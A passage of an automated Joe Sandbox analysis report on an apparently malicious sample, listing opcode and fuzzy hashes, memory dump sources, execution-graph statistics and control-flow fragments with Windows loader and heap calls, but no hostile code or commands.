                                                                        • Opcode ID: 7e542f10753851f78455307a458f9c00cc7eea8ebb6d759004c653b4f673a8da
                                                                        • Instruction ID: 180c790b124e3c01b43a9d639e20287d2373158d78b95f1f9fc60616c93aa44d
                                                                        • Opcode Fuzzy Hash: 7e542f10753851f78455307a458f9c00cc7eea8ebb6d759004c653b4f673a8da
                                                                        • Instruction Fuzzy Hash: DA525FB0A00215DFD760DB58C840FAABBB2AF85715F15C09AD9499F351CB72ED82CF92
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e29fe56131155ce762f7fc055b6ab69b8fc78783627b20d6d1ae40ae34b9b4b1
                                                                        • Instruction ID: c0ca5ec9fbded9b7837ec1c46fbd50e63915c505662e9bb0ae079ef1ee0b5da4
                                                                        • Opcode Fuzzy Hash: e29fe56131155ce762f7fc055b6ab69b8fc78783627b20d6d1ae40ae34b9b4b1
                                                                        • Instruction Fuzzy Hash: AD424FB4B00215DFDB14DB58C850FAABBA2EF89705F548099E9099F351CB72ED82CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50e82586bd5ee20fc8843b38ad54024b39651d367c8310bbcd8a49c5c9ce86b4
                                                                        • Instruction ID: e01dc1f2e012bdbb4c41b9caaa66a7ec143bc2d731bffba8bd079f44a775c735
                                                                        • Opcode Fuzzy Hash: 50e82586bd5ee20fc8843b38ad54024b39651d367c8310bbcd8a49c5c9ce86b4
                                                                        • Instruction Fuzzy Hash: 6B328DB0B00255DFDB14CB98C444FAABBB6AF84715F15806AE905AF791CB72EC41CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05f239638929980b8199cf7b022ca2bf982fc07100cf8e634d914dd3882675d6
                                                                        • Instruction ID: c06af06b52d9845f73114f0a411af2b64fd80cf22e8b9ada8f5c2dc2d318377c
                                                                        • Opcode Fuzzy Hash: 05f239638929980b8199cf7b022ca2bf982fc07100cf8e634d914dd3882675d6
                                                                        • Instruction Fuzzy Hash: D9223DB0B00215DFDB14DB58C850FAABBA2EFC5705F548099E9099F391CB72ED828F91
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode Fuzzy Hash: 39265d914742c8568ebcdef0d9e9a3f9ddd859adbaee750a10de2e647d8041c3
                                                                        • Instruction Fuzzy Hash: 9151A630A002449FDB05DB78C8546AEBFF3EFC5310F1984AED445AB756CE749C468BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee1c08bd329c88de3af2215ac0b94eb8c32d200203df30c846e6d7850a3e3d8
                                                                        • Instruction ID: a0c7656c699e3d0862fd27d395938d8c9b9e523912c3971696d17b02b5f61248
                                                                        • Opcode Fuzzy Hash: 4ee1c08bd329c88de3af2215ac0b94eb8c32d200203df30c846e6d7850a3e3d8
                                                                        • Instruction Fuzzy Hash: B7515334A04685CFCB16CF5CC8909AEBBB2FF49310B258259E955EB3A6C335EC51DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 702aad8be26a4182debd2a3059a36cbcea3d051d2bccda16df84673ace507c1e
                                                                        • Instruction ID: 2405933e4f4249943bf7d8c0407fe6b570d62792f46f31db7c28872457245370
                                                                        • Opcode Fuzzy Hash: 702aad8be26a4182debd2a3059a36cbcea3d051d2bccda16df84673ace507c1e
                                                                        • Instruction Fuzzy Hash: 4C516034A05245DFCB06CF9CC9809ADBBB2FF49320F258299D954EB3A2D335AC41CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff218fdf5173f2254ab47cc40aa7de05567cf7db570764131dbadf5c1eccbd30
                                                                        • Instruction ID: d2230dab81d70030563e672b5ed6bda86791fc84246c4f0369a93768e3bd458a
                                                                        • Opcode Fuzzy Hash: ff218fdf5173f2254ab47cc40aa7de05567cf7db570764131dbadf5c1eccbd30
                                                                        • Instruction Fuzzy Hash: 464107F1A00656DFCB258F649840BFBBBBEBF85262B49409BD9048F352D771C941C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4788d3ed25b535dbe6e205581e30b50a75153368125353af7c53f47e523ab220
                                                                        • Instruction ID: c93251b48e33c40303ed02125fcd7ad3b80c378867850c6fcfd16cd2b517bb56
                                                                        • Opcode Fuzzy Hash: 4788d3ed25b535dbe6e205581e30b50a75153368125353af7c53f47e523ab220
                                                                        • Instruction Fuzzy Hash: 964137B2B002159BCB259E6DC8406FBB7B9EFC4622B14856BC919E7301DF31D915C7E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b950ad048d44fb20e1ccf621fef3462e7029ff2be55efc6e1a1b8e2659542e7f
                                                                        • Instruction ID: 36b1abd42456b517b1f0fb2b85346ff6f60b80560542b85b32b6e4929794dbf7
                                                                        • Opcode Fuzzy Hash: b950ad048d44fb20e1ccf621fef3462e7029ff2be55efc6e1a1b8e2659542e7f
                                                                        • Instruction Fuzzy Hash: 6F417035A002459FDB15EB74D854AAE7BB6FF8D351F084469E802EB7A0CB34AC42DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5302125ab110cd007966516b2f334382ad3cb13e702c42803f86051def7dd850
                                                                        • Instruction ID: 763ff9664621d4d0f9a791d35afd504d1ccfd913a9db5c36afee4938498b51d4
                                                                        • Opcode Fuzzy Hash: 5302125ab110cd007966516b2f334382ad3cb13e702c42803f86051def7dd850
                                                                        • Instruction Fuzzy Hash: E6412D74A00119DFCB05CF9CC994AAEB7F1FF88310B258269EA15AB3A5C735EC51CB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b26fc525af0613a1bbc95230d2c59816a11b6fd77fd78ea16d1d5272eb095703
                                                                        • Instruction ID: 5ea73315c6cc14e52292e2fd2953d6e9b034b820ebe6b6fb67f02e7777769f8b
                                                                        • Opcode Fuzzy Hash: b26fc525af0613a1bbc95230d2c59816a11b6fd77fd78ea16d1d5272eb095703
                                                                        • Instruction Fuzzy Hash: 35410030B00104DFDB18EBB9C8547AEBAF7AFC9310F148469D806AB755DE75AC469BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ef33c469feeeee7506a2fac14b9849b222151dda566a27c1bc2351de4b10cd6
                                                                        • Instruction ID: 906f0d84ba123290de8f4d6eced66691f58f6fe9c2aaceb2fd0e48946e31d5c9
                                                                        • Opcode Fuzzy Hash: 0ef33c469feeeee7506a2fac14b9849b222151dda566a27c1bc2351de4b10cd6
                                                                        • Instruction Fuzzy Hash: 61417F70A05645AFCB05CF58C9949AABBF1FF89320B15829AD944EB253C335EC45CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cb5c30864db241c8390f49b6ec85963d91428142341c2bb187b43c8aa0c8ce1
                                                                        • Instruction ID: df8ab5e19850589d186592ffc2295afdaa09486f916f6ecae9bc3f6791e4cea5
                                                                        • Opcode Fuzzy Hash: 5cb5c30864db241c8390f49b6ec85963d91428142341c2bb187b43c8aa0c8ce1
                                                                        • Instruction Fuzzy Hash: 76412574A00509DFCB09CF59D5959AEFBB1FF48310B118699E906AB365C732FCA1CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22cc2c006f2130ba37414d306b2bf212f5e12ab0d3abdb9a8e9c85c45c97e51b
                                                                        • Instruction ID: 720b0a8f17189f429199866a183fe8217cba3bd942e5f6386375cb53165043e7
                                                                        • Opcode Fuzzy Hash: 22cc2c006f2130ba37414d306b2bf212f5e12ab0d3abdb9a8e9c85c45c97e51b
                                                                        • Instruction Fuzzy Hash: EF411A74E10109DFCB05CF9CC9809AEBBF2FF88360B258268E915A7365C731AC52DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 04d9264a353000beca295d13dbc7965b8cdb16f35073adffbaedfc8ab94a1ff7
                                                                        • Instruction ID: 81b62ea96e15f1f99fc9ef6069c0c2f51e6a1ae231b3928a4e4ed5120f9d22a5
                                                                        • Opcode Fuzzy Hash: 04d9264a353000beca295d13dbc7965b8cdb16f35073adffbaedfc8ab94a1ff7
                                                                        • Instruction Fuzzy Hash: 70415035B002049FDB14EB64D854AAE7BF6FF8C755F044468E806EB7A0CB34AD52DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f709f4ce7367aac9f36d3f81b0578a2625a2febb0a6faa743807dbeb92be7b2
                                                                        • Instruction ID: 7565d4cebeaf5d687738c916687921d8b4badf1de135fde8a015e15acee2c3a0
                                                                        • Opcode Fuzzy Hash: 8f709f4ce7367aac9f36d3f81b0578a2625a2febb0a6faa743807dbeb92be7b2
                                                                        • Instruction Fuzzy Hash: 4E31F8B4B00210DBE70497B4C814FEE7AA7AFC5750F548069E9056F785CF759C468BA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8379fc85f7bc322f433382711fbb250f1ca099e65f76819fc5b35ba6f695fb45
                                                                        • Instruction ID: 48ab88174004f143c146171319f7965dbd76bafe9226be20bff865bc4e7f4957
                                                                        • Opcode Fuzzy Hash: 8379fc85f7bc322f433382711fbb250f1ca099e65f76819fc5b35ba6f695fb45
                                                                        • Instruction Fuzzy Hash: 832126F56042528FDF118B2498007FA7FAD9FC6265F0450BBD844CB392EB769985C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 90635258db90fa96c66e34404daffc153151c2231c3ea3d01c9f283bbb252745
                                                                        • Instruction ID: f3b35c0162c437a898770c0f2e792c2ef20bfba46de357d8f19685ffe2213893
                                                                        • Opcode Fuzzy Hash: 90635258db90fa96c66e34404daffc153151c2231c3ea3d01c9f283bbb252745
                                                                        • Instruction Fuzzy Hash: BA316D75A052858FCB02CFA8D8909AABBB0FF4A310B154196D545EB392D334ED45CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59448a3b763204713bd88d80bfc2a8f9cbbc521b9340bed5a4601ed9b6664b69
                                                                        • Instruction ID: 61741a971fed9c91590380d78f935afeb58bdd324388e6cdd90ea38c87375930
                                                                        • Opcode Fuzzy Hash: 59448a3b763204713bd88d80bfc2a8f9cbbc521b9340bed5a4601ed9b6664b69
                                                                        • Instruction Fuzzy Hash: AA2141B6500300EFDF14CF10D9C0B26BFA1FB88318F20C5ADE90A0A656C336C816CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 379ad975784910339a00c89bf722f8ca172fc4ded4efa364eb9771786b0e2ab2
                                                                        • Instruction ID: 584744d5246f851c592c08788fcb5ba34002cf60396ea637f66e5336db9d079c
                                                                        • Opcode Fuzzy Hash: 379ad975784910339a00c89bf722f8ca172fc4ded4efa364eb9771786b0e2ab2
                                                                        • Instruction Fuzzy Hash: BA2105F1604244DFDB04DF24D5C0B26BBA9FB84718F20C56DD90A4B661C77AD846CA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                        • Instruction ID: ebe6926777e183c08628477ff765b3286f50903784912a14ee53deacc6abb68b
                                                                        • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                        • Instruction Fuzzy Hash: 85218E76504240DFCF16CF10D9C4B16BF61FB84318F24C5ADD90A4A666C33AD556CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                        • Instruction ID: 8c5a3ad11937ac639e1def64eafb25b474773d693a2ecc3365986f7731741deb
                                                                        • Opcode Fuzzy Hash: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                        • Instruction Fuzzy Hash: 3F11E0B6504684CFCB05DF20D6C4B15BBA1FB84318F24C6ADC84A4BA62C33AD54ACB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a48ad1430cb29888a7bb58b8ef758358b65aa50f6297972f5b52e4a59519a14
                                                                        • Instruction ID: e10527ab7c54ec7fa4c5f205904c752f71ef266c256650608f6769521252614c
                                                                        • Opcode Fuzzy Hash: 9a48ad1430cb29888a7bb58b8ef758358b65aa50f6297972f5b52e4a59519a14
                                                                        • Instruction Fuzzy Hash: 6A01526140E3C05FD7128B258994752BFB8DF43224F1DC1DBD9898F2A3C2695845C7B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd

                                                                        Execution Graph

                                                                        Execution Coverage:0.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:93.1%
                                                                        Total number of Nodes:145
                                                                        Total number of Limit Nodes:7

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 4 22aa2b60-22aa2b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 5 22aa2c70-22aa2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 22aa2df0-22aa2dfc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7 22aa35c0-22aa35cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 22aa2c0a-22aa2c0f 1 22aa2c1f-22aa2c26 LdrInitializeThunk 0->1 2 22aa2c11-22aa2c18 0->2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        • Opcode ID: 644b1b8545185927948352e8f07e6739902d967bfc289065cd1f2f76ff429e60
                                                                        • Instruction ID: 3d25d4e30cfe7d788a0abe3a8c318ad30de57c5fb17f9d2898c17a2972e18190
                                                                        • Opcode Fuzzy Hash: 644b1b8545185927948352e8f07e6739902d967bfc289065cd1f2f76ff429e60
                                                                        • Instruction Fuzzy Hash: B5329C706083518BC724CF19C690B6EB7F1FF88B44F14492EFA859BAA0E734D944CB96

                                                                        Control-flow Graph

                                                                        control_flow_graph
                                                                        627 22a6a2c3-22a6a312 GetPEB
                                                                        628 22ac2b5e-22ac2b60 627->628
                                                                        629 22a6a318 627->629 628->629
                                                                        631 22ac2b66-22ac2b74 GetPEB 628->631
                                                                        630 22a6a31a-22a6a322 629->630
                                                                        632 22ac2b79-22ac2b80 call 22a73d20 630->632
                                                                        633 22a6a328-22a6a32a 630->633 631->630
                                                                        640 22ac2b92 632->640
                                                                        641 22ac2b82-22ac2b90 GetPEB 632->641
                                                                        634 22a6a330-22a6a335 633->634
                                                                        635 22ac2be3 633->635 634->635
                                                                        637 22a6a33b-22a6a340 634->637 637->635
